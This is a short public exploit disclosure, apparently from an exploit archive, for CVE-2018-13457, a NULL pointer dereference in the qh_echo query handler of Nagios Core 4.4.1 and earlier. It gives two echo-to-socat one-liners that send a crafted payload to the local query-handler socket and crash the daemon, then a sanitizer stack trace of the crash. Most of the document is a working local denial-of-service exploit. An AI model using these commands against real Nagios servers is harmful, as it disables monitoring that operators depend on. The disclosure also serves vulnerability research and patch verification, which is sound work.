CVE-2018-13457
# Exploit Title: Nagios Core qh_echo Denial of Service
# Date: 2018-07-09
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.nagios.org/
# Software Link: https://www.nagios.org/downloads/nagios-core/
# Version: 4.4.1 and earlier
# Tested on: 4.4.1
# CVE : CVE-2018-13457

qh_echo in Nagios Core 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attackers to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.

$ echo -ne "#echo\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne "@echo\0" | socat unix-connect:./poc/nagios.qh -

#0 0x4cb18b in __interceptor_strcmp.part.60 /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:422
#1 0x554e98 in qh_echo /home/user/nagioscore/base/query-handler.c:29:7
#2 0x5543db in qh_input /home/user/nagioscore/base/query-handler.c:227:12
#3 0x6fac51 in iobroker_poll /home/user/nagioscore/lib/iobroker.c:353:4
#4 0x5bc334 in event_execution_loop /home/user/nagioscore/base/events.c:1136:12
#5 0x53a503 in main /home/user/nagioscore/base/nagios.c:844:4
#6 0x7f183c5f782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#7 0x42b278 in _start (/home/user/nagioscore/base/nagios+0x42b278)